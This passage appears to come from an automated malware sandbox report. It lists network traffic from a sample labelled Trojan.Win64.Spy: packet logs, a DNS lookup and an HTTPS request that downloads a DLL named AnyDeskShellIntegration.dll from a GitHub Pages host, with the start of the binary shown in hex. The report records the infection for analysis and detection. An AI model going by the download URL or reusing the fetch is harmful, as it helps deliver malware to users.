                                                                                                    Sep 29, 2024 02:26:43.443408012 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:43.901525974 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:43.901674032 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:43.902221918 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:43.902236938 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:43.902412891 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:43.902426004 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:44.000750065 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:44.000848055 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:44.000916958 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:44.000973940 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:44.000988007 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:44.001045942 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:44.001101017 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:44.001987934 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:44.002006054 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:49.817707062 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:49.817747116 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:49.817854881 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:49.818120956 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:49.818136930 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.449127913 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.449269056 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.449767113 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.449771881 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.449933052 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.449939013 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.547455072 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.547523975 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.547534943 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.547549963 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.547585011 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.547585011 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.548408985 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.548423052 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:55.942842960 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:55.942904949 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:55.943015099 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:55.943372011 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:55.943398952 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.409133911 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.409252882 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.409719944 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.409730911 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.409945965 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.409951925 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.517827034 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.517944098 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.517949104 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.517999887 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.518860102 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.518882990 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:01.942675114 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:01.942714930 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:01.942791939 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:01.943005085 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:01.943017006 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.399147987 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.399270058 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.399781942 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.399791956 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.399993896 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.399998903 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.499573946 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.499679089 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.499731064 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.499799013 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.499958992 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.500005960 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.500006914 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.500052929 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.500802994 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.500818968 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:07.895812035 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:07.895853043 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:07.898472071 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:07.898745060 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:07.898756027 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.360970974 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.361155033 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:08.362184048 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:08.362190962 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.362425089 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:08.362430096 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.462281942 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.462372065 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:08.462385893 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.462399960 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.462428093 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:08.462455034 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:08.463438988 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:08.463454008 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:13.895982027 CEST49735443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:13.896056890 CEST44349735185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:13.896161079 CEST49735443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:13.896411896 CEST49735443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:13.896426916 CEST44349735185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:14.352746010 CEST44349735185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:14.355182886 CEST49735443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:14.355820894 CEST49735443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:14.355851889 CEST44349735185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:14.356096983 CEST49735443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:14.356110096 CEST44349735185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:14.453397989 CEST44349735185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:14.453470945 CEST49735443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:14.453500986 CEST44349735185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:14.453545094 CEST49735443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:14.453562021 CEST44349735185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:14.453593016 CEST44349735185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:14.453622103 CEST49735443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:14.453655958 CEST49735443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:14.454498053 CEST49735443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:14.454529047 CEST44349735185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:19.907066107 CEST49736443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:19.907128096 CEST44349736185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:19.907366991 CEST49736443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:19.909523964 CEST49736443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:19.909543037 CEST44349736185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:20.366498947 CEST44349736185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:20.366580963 CEST49736443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:20.367086887 CEST49736443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:20.367096901 CEST44349736185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:20.367368937 CEST49736443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:20.367373943 CEST44349736185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:20.468698025 CEST44349736185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:20.468765974 CEST49736443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:20.468786001 CEST44349736185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:20.468838930 CEST49736443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:20.469233036 CEST44349736185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:20.469299078 CEST44349736185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:20.469326019 CEST49736443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:20.469335079 CEST49736443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:20.469736099 CEST49736443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:20.469749928 CEST44349736185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:26.057590008 CEST49737443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:26.057626009 CEST44349737185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:26.057744026 CEST49737443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:26.063505888 CEST49737443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:26.063517094 CEST44349737185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:26.548043013 CEST44349737185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:26.548232079 CEST49737443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:26.551956892 CEST49737443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:26.551963091 CEST44349737185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:26.552236080 CEST49737443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:26.552238941 CEST44349737185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:26.655817032 CEST44349737185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:26.655936003 CEST44349737185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:26.655941963 CEST49737443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:26.656056881 CEST49737443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:26.656969070 CEST49737443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:26.656982899 CEST44349737185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:32.275394917 CEST49739443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:32.275454998 CEST44349739185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:32.275522947 CEST49739443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:32.276901960 CEST49739443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:32.276928902 CEST44349739185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:32.746293068 CEST44349739185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:32.746367931 CEST49739443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:32.748567104 CEST49739443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:32.748603106 CEST44349739185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:32.748756886 CEST49739443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:32.748771906 CEST44349739185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:32.889493942 CEST44349739185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:32.889600992 CEST44349739185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:32.889688969 CEST49739443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:32.891204119 CEST49739443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:32.891228914 CEST44349739185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:38.693979025 CEST49740443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:38.694030046 CEST44349740185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:38.694098949 CEST49740443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:38.694637060 CEST49740443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:38.694645882 CEST44349740185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:39.176040888 CEST44349740185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:39.176177979 CEST49740443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:39.176582098 CEST49740443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:39.176594019 CEST44349740185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:39.176743984 CEST49740443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:39.176748991 CEST44349740185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:39.281143904 CEST44349740185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:39.281311035 CEST49740443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:39.281331062 CEST44349740185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:39.281363964 CEST44349740185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:39.281409979 CEST49740443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:39.283015966 CEST49740443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:39.283032894 CEST44349740185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:45.120990992 CEST49741443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:45.121028900 CEST44349741185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:45.121126890 CEST49741443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:45.163561106 CEST49741443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:45.163573980 CEST44349741185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:45.645143986 CEST44349741185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:45.645437002 CEST49741443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:45.653729916 CEST49741443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:45.653743982 CEST44349741185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:45.654138088 CEST49741443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:45.654145002 CEST44349741185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:45.756556034 CEST44349741185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:45.756628990 CEST49741443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:45.756649971 CEST44349741185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:45.756664991 CEST44349741185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:45.756712914 CEST49741443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:45.761702061 CEST49741443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:45.761719942 CEST44349741185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:51.631113052 CEST49742443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:51.631156921 CEST44349742185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:51.631218910 CEST49742443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:51.631481886 CEST49742443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:51.631499052 CEST44349742185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:52.084678888 CEST44349742185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:52.085901976 CEST49742443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:52.086102009 CEST49742443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:52.086102009 CEST49742443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:52.086113930 CEST44349742185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:52.086127996 CEST44349742185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:52.185965061 CEST44349742185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:52.186029911 CEST49742443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:52.186050892 CEST44349742185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:52.186081886 CEST44349742185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:52.186222076 CEST49742443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:52.187185049 CEST49742443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:52.187207937 CEST44349742185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:57.898248911 CEST49743443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:57.898293972 CEST44349743185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:57.898425102 CEST49743443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:57.900075912 CEST49743443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:57.900084019 CEST44349743185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:58.363306999 CEST44349743185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:58.363852024 CEST49743443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:58.366193056 CEST49743443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:58.366200924 CEST44349743185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:58.366712093 CEST49743443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:58.366715908 CEST44349743185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:58.464368105 CEST44349743185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:58.464473009 CEST44349743185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:58.464473963 CEST49743443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:58.464520931 CEST49743443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:58.466967106 CEST49743443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:58.466985941 CEST44349743185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:28:04.088366032 CEST49744443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:28:04.088407993 CEST44349744185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:28:04.088465929 CEST49744443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:28:04.095982075 CEST49744443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:28:04.095993996 CEST44349744185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:28:04.662873030 CEST44349744185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:28:04.667566061 CEST49744443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:28:04.677962065 CEST49744443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:28:04.677973032 CEST44349744185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:28:04.678298950 CEST49744443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:28:04.678303003 CEST44349744185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:28:04.778014898 CEST44349744185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:28:04.778100014 CEST49744443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:28:04.778106928 CEST44349744185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:28:04.778124094 CEST44349744185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:28:04.778172016 CEST49744443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:28:04.791537046 CEST49744443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:28:04.791554928 CEST44349744185.199.110.153192.168.2.6

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Sep 29, 2024 02:26:00.380841970 CEST5168053192.168.2.61.1.1.1
                                                                                                    Sep 29, 2024 02:26:00.389503956 CEST53516801.1.1.1192.168.2.6

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Sep 29, 2024 02:26:00.380841970 CEST192.168.2.61.1.1.10xd606Standard query (0)duy-thanh.github.ioA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Sep 29, 2024 02:26:00.389503956 CEST1.1.1.1192.168.2.60xd606No error (0)duy-thanh.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                                                    Sep 29, 2024 02:26:00.389503956 CEST1.1.1.1192.168.2.60xd606No error (0)duy-thanh.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                                                    Sep 29, 2024 02:26:00.389503956 CEST1.1.1.1192.168.2.60xd606No error (0)duy-thanh.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                                                    Sep 29, 2024 02:26:00.389503956 CEST1.1.1.1192.168.2.60xd606No error (0)duy-thanh.github.io185.199.108.153A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • duy-thanh.github.io

                                                                                                    HTTPS Proxied Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.649710185.199.110.1534432404C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:00 UTC77OUTGET /file/AnyDeskShellIntegration.dll HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:01 UTC757INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 54784
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: application/octet-stream
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-d600"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:01 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: C0DE:3D4C4C:2868506:2D39471:66F89E98
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:01 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-nyc-kteb1890096-NYC
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569561.980613,VS0,VE58
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: bb1ddaba8350fa10e4663133e25dba3bfd8a6200
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 74 6e 1d 65 30 0f 73 36 30 0f 73 36 30 0f 73 36 7b 77 70 37 35 0f 73 36 7b 77 76 37 b6 0f 73 36 7b 77 77 37 3a 0f 73 36 20 8b 70 37 39 0f 73 36 20 8b 77 37 3e 0f 73 36 20 8b 76 37 10 0f 73 36 7b 77 72 37 33 0f 73 36 30 0f 72 36 69 0f 73 36 78 8a 7a 37 32 0f 73 36 78 8a 8c 36 31 0f 73 36 30 0f e4 36 31 0f 73 36 78 8a 71 37 31 0f 73 36 52 69 63 68 30 0f 73 36 00 00 00 00 00 00 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$tne0s60s60s6{wp75s6{wv7s6{ww7:s6 p79s6 w7>s6 v7s6{wr73s60r6is6xz72s6x61s6061s6xq71s6Rich0s6
